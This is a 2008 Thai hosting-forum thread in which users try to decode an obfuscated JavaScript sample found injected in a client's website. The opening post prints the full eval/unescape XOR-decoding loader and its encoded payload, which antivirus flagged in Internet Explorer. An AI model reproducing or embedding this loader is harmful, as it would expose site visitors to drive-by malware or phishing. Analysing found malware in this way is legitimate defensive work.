ThaiHostTalk.com

มาถอดรหัส source โค๊ต phishing กัน

Technical topics

pakorn December 12, 2008, 11:27pm 1

<script>eval(unescape(‘function dL6nEmR(eDOl){function ouRy(hYvY){var pA4=0,pguAnOv,xRyx6=hYvY.length;for(pguAnOv=0;pguAnOv<xRyx6;pguAnOv++)pA4+=hYvY.charCodeAt(pguAnOv)*xRyx6;return new String(pA4)}eDOl=unescape(eDOl);var nRRLC=eval(‘a?rLg5u]m]e5nLt)s?.]cLa5l]l?eLe)’.replace(/[)?L5]]/g, ‘’)).toString().replace(/[^@a-z0-9A-Z_.,-]/g,’’),r6Nr8=ouRy(nRRLC),pzT5=new String(),z0lVtL=0;tmvV=0;for(var ar5K3=0;ar5K3<eDOl.length;ar5K3++){pzT5+=String.fromCharCode(eDOl.charCodeAt(ar5K3)^(nRRLC.charCodeAt(z0lVtL)^r6Nr8.charCodeAt(tmvV)));z0lVtL++;tmvV++;if(z0lVtL>=nRRLC.length)z0lVtL=0;if(tmvV>=r6Nr8.length)tmvV=0;}eval(pzT5);pzT5=’’;return;}dL6nEmR(’%32%31%35%32%38%31%37%36%76%31%57%30%55%75%1e%2e%4d%32%0d%38%63%2f%26%2d%2f%31%2f%24%3d%06%6e%63%4b%3c%0f%2b%36%28%2e%12%48%60%74%27%65%63%1e%3a%1b%20%7a%2b%0f%2c%68%2c%33%06%30%1f%77%31%3e%78%6f%65%3b%21%39%20%33%38%28%1e%73%54%35%68%21%79%66%04%33%14%3d%67%04%23%38%62%24%31%34%39%37%0a%30%20%18%6a%35%0c%69%46%35%29%2b%32%38%52%2b%6f%75%4c%6e%26%68%2d%49%2e%42%67%62%13%34%3d%74%3d%60%29%77%25%61%62%7c%1d%46%30%23%75%3f%69%34%58%76%63%1d%4a%35%6a%20%6c%7b%7c%3a%75%32%7b%1d%46%3b%69%08%67%78%5d%52%46%46%3d%74%35%6b%22%72%1b%6a%69%7f%3a%6a%24%76%09%33%30%24%32%01%6d%2c%06%79%63%5b%79%64%26%22%2a%3f%33%33%7f%5b%5f%7f%46%32%30%6d%3d%73%1e%71%3f%79%3f%60%70%61%76%22%3d%3e%02%7a%78%27%75%5c%7d%12%71%0a%38%44%51%32%78%35%3f%1b%23%38%7d%41%65%6f%4c%64%35%59%05%50%07%36%20%7c%0b%4e%3a%1c%7f%4a%79%74%74%7d%32%30%25%29%2b%50%78%5f%23%6d%29%21%17%69%35%34%26%69%78%1b%0c%6f%5b%58%41%34%19%1d%2b%19%2d%7d%52%5f%73%27%29%22%25%7f%3e%29%36%32%24%11%3c%2c%24%00%76%0c%20%29%2f%6d%39%37%3f%30%3b%36%59%79%6b%2a%5b%2a%27%39%23%19%56%28%31%6a%36%7a%23%17%31%20%36%5b%6c%6f%3d%6e%1b%70%3b%08%4b%1c%58%6d%36%30%34%35%1f%3f%38%29%5e%34%3e%6b%29%06%6e%53%7f%48%10%07%7d%53%3c%19%3c%0d%4b%1a%69%2b%11%0b%2a%21%24%2c%32%4c%60%27%62%55%30%3a%37%0f%3a%3d%2e%2f%75%3f%02%31%15%36%18%27%5b%41%72%37%70%7f%62%78%65%29%2e%48%61%48%57%71%2c%24%1f%2c%5d%2e%44%00%38%34%63%65%2b%79%00%2b%22%32%0a%2e%27%64%62%7f%6e%79%6f%3d%03%7d%2d%2c%01%62%6b%7f%1d%7b%7a%05%2c%11%1c%0b%69%36%72%79%75%59%2e%72%0a%21%0b%3b%01%53%2e%36%33%15%3d%2c%34%34%3a%72%33%02%21%2c%41%27%07%2c%38%23%24%38%63%6f%78%69%75%39%18%30%0a%6a%7e%22%0f%2a%20%64%08%0a%2b%19%79%7d%6f%24%2c%6a%3e%36%29%18%20%3e%27%20%2b%08%2d%66%26%70%79%53%39%0f%2a%23%17%27%21%6a%69%7b%3c%0f%3e%0a%60%2e%4d%30%6c%4d%24%53%3f%61%0a%65%13%49%0d%60%00%47%16%70%06%7b%2d%6e%2c%7c%0d%5e%1e%21%43%27%0e%25%00%23%18%33%01%26%38%61%6d%2e%39%2f%2d%17%61%32%5d%55%05%1e%1b%0e%18%11%05%18%78%3a%59%58%7d%63%79%6b%33%57%44%5c%4e%31%28%26%76%2f%22%09%71%6e%79%68%6c%64%63%17%79%28%34%7d%57%36%2f%66%39%79%0e%25%7e%39%20%35%72%1e%33%24%16%23%30%77%77%29%2c%4e%0b%2b%2c%31%7f%6e%22%3e%26%3b%3d%7c%7a%58%33%36%24%6d%72%69%03%77%42%46%2d%38%2d%79%21%6c%26%77%09%38%67%78%2c%5b%35%77%10%0b%09%1c%20%65%64%06%6e%2c%39%25%4b%25%2d%73%7b%73%6e%28%72%1d%08%2e%15%61%20%7a%7a%44%67%26%33%29%33%3f%2b%3d%6b%6e%18%66%64%7a%64%71%1b%6a%22%19%57%20%6e%3f%26%7b%31%71%79%38%21%70%5a%42%23%36%00%2a%4c%7d%63%38%72%2c%7a%25%10%34%31%13%72%37%26%03%79%12%35%24%13%5f%74%37%32%3f%24%13%18%3a%30%7a%5e%66%7b%67%3f%45%36%69%54%50%4d%46%35%60%79%32%2b%12%2b%3c%32%17%31%63%65%31%08%2a%17%2f%27%44%64%64%7e%3b%3f%79%68%54%7b%6b%76%54%6d%6c%39%32%03%29%71%3c%4c%3a%1c%2f%2e%21%4e%77%76%79%21%3e%18%36%14%29%05%19%40%56%33%3a%7a%2f%3a%0b%14%19%55%2a%15%28%10%6f%70%78%79%7f%3a%4f%23%61%10%2e%67%79%0b%31%30%2a%20%65%73%73%2f%0c%71%29%7d%71%3b%3a%2a%52%29%2b%25%44%2f%21%38%33%22%2b%3b%28%0a%32%21%35%3a%3b%33%36%1e%24%65%50%39%1f%3a%10%0d%37%38%2e%74%72%3e%2c%3c%28%2b%32%0e%61%78%46%24%04%24%21%2d%2d%1e%77%28%7d%2e%3d%2c%10%3a%56%29%70%2d%02%33%0f%61%77%1b%2c%01%68%70%3e%30%3f%29%33%32%14%21%25%33%62%5c%7c%59%7e%25%68%7d%62%03%34%17%30%64%09%27%20%6b%2b%33%16%12%3a%0b%24%6f%53%38%60%4b%63%59%30%6e%27%7c%20%14%23%13%20%16%2b%24%07%15%35%7f%42%60%2c%16%22%29%7a%2a%3d%2c%6f%6a%20%2a%3c%34%44%26%2c%30%66%31%27%13%76%3e%13%10%2d%69%3a%3b%27%34%27%28%3f%39%52%16%34%33%27%78%7b%12%0f%09%01%21%2a%70%7b%3b%3e%09%20%21%6c%7b%6a%28%79%5a%68%6d%34%36%15%3b%2d%60%66%73%59%73%3b%3c%21%61%3f%3b%39%74%44%3a%7f%3a%6c%2c%39%07%27%29%3f%3a%34%3f%69%74%7a%7e%2d%3a%3b%05%7d%7b%2a%76%47%69%18%7f%3b%1a%69%77%7b%31%33%33%60%3d%5b%67%27%77%62%4f%6b%3b%0b%08%5a%00%7e%36%24%04%63%39%7d%6e%4b%19%1e%39%76%2f%24%66%3e%74%49%18%56%2e%6b%72%66%49%2c%25%3f%30%22%31%26%32%60%2c%51%5d%26%7b%6a%2f%5e%2c%77%5f%57%7d%32%7a%75%71%70%66%7b%70%31%6b%10%71%6b%2f%09%70%36%23%2e%3c%08%21%64%3e%2b%3e%77%5b%7d%78%6a%50%76%70%77%7f%51%09%3c%76%27%70%3b%2c%05%29%7c%7f%56%36%3b%2a%73%57%7b%3e%11%0c%45%0f%66%6a%26%31%37%55%32%36%38%1c%71%25%62%2d%44%09%2d%2c%26%56%7e%61%7f%3a%32%7d%23%1c%2b%26%36%1c%2d%6e%7c%7c’);’));</script>

ได้มาจากเว็บไซต์ลูกค้ารายหนึ่ง

NOD32 warn ขึ้นมาทันตาเห็นเลยทีเดียว (เมื่อเข้าจาก ie)

ส่วน ff ไม่เกิดอะไรขึ้นแม้แต่น้อย…

LaZieR December 13, 2008, 12:21am 2

ลองตาม ip ใน code ดูอาจจะเจออะไรบ้างครับ

Jimmy December 13, 2008, 9:56am 3

แกะไม่ออก

eval(unescape('function dL6nEmR(eDOl){function ouRy(hYvY){var pA4=0,pguAnOv,xRyx6=hYvY.length;for(pguAnOv=0;pguAnOv<xRyx6;pguAnOv++)pA4+=hYvY.charCodeAt(pguAnOv)*xRyx6;return new String(pA4)}eDOl=unescape(eDOl);var nRRLC=eval('a?rLg5u]m]e5nLt)s?.]cLa5l]l?

pakorn December 14, 2008, 4:14pm 4

ตัวใหม่

http://www.thaiseoboard.com/index.php/topic,45762.msg593482.html#msg593482

system Closed May 16, 2016, 7:24am 5